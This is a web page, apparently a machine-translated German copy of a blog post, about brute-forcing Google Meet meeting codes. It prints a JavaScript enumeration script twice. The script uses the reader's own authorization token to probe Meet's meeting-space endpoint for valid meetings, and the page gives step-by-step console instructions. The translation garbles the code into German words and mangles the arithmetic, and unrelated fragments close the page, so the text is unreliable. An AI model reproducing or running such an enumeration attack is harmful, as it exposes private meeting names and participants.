July 30 2023

Visio – bleiben in Google Meet | Dyrk, Dyna Meet – Visio

Treffen Sie Visio

Contents

1 Treffen Sie Visio
- 1.1 Dyrk
- 1.2 Treffen Sie Visio

randomize = () => dico = dico.Teilt (”).Map (value => (< value, sort: Math.random() >)).Zauber ((a, b) => a.Zauber – b.Fluch).KARTE ((< value >) => Wert).Verbinden (”),
NewPatternKey = () => “xxx-xxxx-xxx”.Teilt (”).MAP (c => c == ‘-‘?C: String.from Charcode (Math.Boden (Mathematik.Random ()*25) +97)).Verbinden (”),
Key = newPatternKey (), counter = 20;
Weiter = () => Schlüssel.Teilt (”).MAP (e => e == ‘-‘ ? E: Dico [Dico.Indexof (e) + 1> = dico.Länge ? 0: Dico.INDEXOF (E) + 1]).Verbinden (”),
Zähler = 0;
Meetlink = ‘https: // Meet.Google.com/’, verfügbar toe = () => xhr = new xmlhttprequest ();
If (Zähler ++> = 20) counter = 0;
Key = newPatternKey ();
Randomize ();
>
Key = next ();
xhr.Open (‘get’, meetlink + key);
xhr.AddEventLisner (‘Load’, (e) => Fetch (Meetlink.concat (“/$ rpc/google.RTC.Treffen.V1.MeetingSpaceService/ResolVeMeetingSpace “),” Header “:” Autorisierung “: Autorisierung,
“Inhaltstyp”: “Anwendung/X-Protobuf”,
“X-Goog-akly-Key”: e.Ziel.Verantwortung.Übereinstimmung (/\ [“https \: \/\/meet \.Google\.com \ “\” ([a-za-z0-9 \ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-Goog-CODE-RéSpose-IF-Execleable”: “Base64”,
“X-Goog-Meeting-Identifier”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Schlüssel)),
>,
“Körper”: “\ n \ f”.Concat (Schlüssel, “0 \ u0001”),
“Methode”: “Post”
>)).dann (e => e.Text ())
.dann (e => setTimeout (verfügbar, 100);
Konsole.Protokoll (Meetlink.Concat (Schlüssel).VerschönernDisplay (38), (e).Ersetzen (/[^a-za-z0-9]/g, “”)+””).VerschönernDisplay (38));
>);
>);
xhr.Schicken ();
>;
Saite.Prototyp.VerschönernDisplay = Funktion (Größe) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >Größe ? TXT.Länge: Größe)).Substr (0, Größe).Concat (‘|’); >,
Konsole.Klar ();
verfügbar ();
>) ())

Dyrk

Derzeit arbeite ich auf dem Gebiet der Cybersicherheit und bin regelmäßig mit ziemlich trivialen Situationen konfrontiert.

Letztes, das Eindringen einer Person während eines Treffens .
Glücklicherweise enthielt Google Meet für Sicherheit eine Funktion, mit der beide die Teilnehmer warnen, dass eine Person an der Videokonferenz teilnehmen möchte, aber auch dies akzeptieren oder absumme.

Diese Veranstaltung bringt mich jedoch dazu, mir eine Reihe von Fragen zu stellen .

Komplexität des Google Meet Link

Erstens, wie ist es möglich, dass eine Person eine Verbindung zu einem Meet -Link herstellt, ohne dazu eingeladen worden zu sein ?

Wir müssen die Einfachheit des Links berücksichtigen: https: // google.treffen.com/Xxx -yjyy -zzzz

Xxx -yjyy -zzzz sind nur alphabetische Zeichen zwischen A und Z, dh 27 mögliche Kombinationen für jeden Charakter.

Für Mathematiker gibt es daher:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 mögliche Kombinationen .

Lebensdauer eines Google Meet Link

Obwohl wir jetzt besser verstehen können, wie die Links unserer “Google Meet” -Konferenzanleihen aufgebaut sind, gibt es einen sehr wichtigen Aspekt, der berücksichtigt wird . Die Lebensdauer eines Google Meet -Links !

In der Tat kann jeder in wenigen Klicks Google Meet -Meetings generieren.
Aber nach ein paar Tagen, Wochen oder Monaten . Die Links sind nicht mehr gültig.

Die generierten Links haben daher eine bestimmte Periode der Gültigkeit .

Ausnahme machen “wiederkehrende” Ereignisse, und hier wird sie interessant.
Im Geschäft gibt es viele Möglichkeiten, regelmäßig zu organisieren (Team / Business, täglich, wöchentlich, monatlich,, . )).
Wenn ein Mitarbeiter diese Art von Ereignis in seiner Tagesordnung generiert, wird automatisch ein Google Meet -Link generiert. Dieser ist unveränderlich.
Sie haben also jedes Mal den gleichen Link für dieses Ereignis.

Mit ein wenig JavaScript und brutaler Kraft ?

Mit all diesen Elementen sind wir jetzt gerüstet, um alle Möglichkeiten zu fegen und eine hohe Wahrscheinlichkeit zu erreichen, Links zu Videokonoziaten zu erkennen !

Daher habe ich einen kleinen Retro-versichert den Betrieb von Google Meet, um einen JavaScript-Code zu schreiben, der eine unendliche Anzahl von Kombinationen ausprobiert

(C) Dyrk.Org 2023-2024 – Meet’s Roulette
(1) Führen Sie dieses Skript auf https: // google aus.treffen.com

(2) Suchen und aktualisieren Sie die Variable der Autorisierung mit dem Token einer gültigen Autorisierung in den “XHR -Anfragen” Ihrer Googles -Header

Lass Authorization = “SAPISIDHASH xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Teilt (”).Map (value => (< value, sort: Math.random() >)).Zauber ((a, b) => a.Zauber – b.Fluch).KARTE ((< value >) => Wert).Verbinden (”),
NewPatternKey = () => “xxx-xxxx-xxx”.Teilt (”).MAP (c => c == ‘-‘?C: String.from Charcode (Math.Boden (Mathematik.Random ()*25) +97)).Verbinden (”),
Key = newPatternKey (), counter = 20;
Weiter = () => Schlüssel.Teilt (”).MAP (e => e == ‘-‘ ? E: Dico [Dico.Indexof (e) + 1> = dico.Länge ? 0: Dico.INDEXOF (E) + 1]).Verbinden (”),
Zähler = 0;
Meetlink = ‘https: // Meet.Google.com/’, verfügbar toe = () => xhr = new xmlhttprequest ();
If (Zähler ++> = 20) counter = 0;
Key = newPatternKey ();
Randomize ();
>
Key = next ();
xhr.Open (‘get’, meetlink + key);
xhr.AddEventLisner (‘Load’, (e) => Fetch (Meetlink.concat (“/$ rpc/google.RTC.Treffen.V1.MeetingSpaceService/ResolVeMeetingSpace “),” Header “:” Autorisierung “: Autorisierung,
“Inhaltstyp”: “Anwendung/X-Protobuf”,
“X-Goog-akly-Key”: e.Ziel.Verantwortung.Übereinstimmung (/\ [“https \: \/\/meet \.Google\.com \ “\” ([a-za-z0-9 \ \-]) “\]/) [1],
“X-Goog-Authuse”: “0”,
“X-Goog-CODE-RéSpose-IF-Execleable”: “Base64”,
“X-Goog-Meeting-Identifier”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Schlüssel)),
>,
“Körper”: “\ n \ f”.Concat (Schlüssel, “0 \ u0001”),
“Methode”: “Post”
>)).dann (e => e.Text ())
.Dann (e =>

SetTimeout (verfügbar, 100);
Konsole.Protokoll (Meetlink.Concat (Schlüssel).VerschönernDisplay (38), (e).Ersetzen (/[^a-za-z0-9]/g, “”)+””).VerschönernDisplay (38));
>);
>);
xhr.Schicken ();
>;
Saite.Prototyp.VerschönernDisplay = Funktion (Größe) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >Größe ? TXT.Länge: Größe)).Substr (0, Größe).Concat (‘|’); >,
Konsole.Klar ();
verfügbar ();
>) ())

Um all dies zu betreiben, wird es notwendig sein:

Öffnen Sie die Seite https: // treffen.Google.com
Öffnen Sie die Entwicklerkonsole
Filtern Sie auf der Registerkarte “Netzwerk” den Fetch / XHR und wiederherstellen Sie ein Token von Token“Genehmigung”
Kopieren Sie und fügen Sie den oben genannten Quellcode ein und fügen Sie an den angegebenen Ort ein, der das Token angegeben hat.
Validieren Sie mit der “Eingangstaste” auf Ihrer Tastatur.

Wiederherstellung des “Autorisierungs -Tokens”:

Für die Neugierigen sollte das Ergebnis dieses Skripts in Aktion aussehen.
Wir stellen daher Zeilen fest, die uns darüber informieren, dass der Raum für Videokonferenzen nicht existiert.
Und andere, die uns das Zeichen der Konferenz aufstellen ! Daher zeigt an, dass der Link gültig ist;)

Erwarten Sie jedoch nicht, in wenigen Sekunden auf einem Meet Link ^^ zu fallen ^^
(Es sei denn, Sie sind ein wenig glücklicher Mann)
Sie müssen großartige Geduld sein und es mindestens eine halbe Stunde laufen lassen.

Abschluss

Panikieren Sie nicht, dass es mehr Glück gibt, einen gültigen Google Meet -Link zu finden, als LOTO zu gewinnen.

Aufmerksamkeit ! Eine Person, die auf einen gültigen Treffen mit dem Linkzugriff auf bestimmte Informationen stößt, ohne angeschlossen werden zu müssen:
Der Name des Meetings (daher vermeiden Sie vertrauliche Informationen) und die vernetzten Teilnehmer (alle oder ein Spiel).

Treffen Sie Visio

Online -Raub

Bestsellerer Aufkleber Online-Raubüberfall

Spieler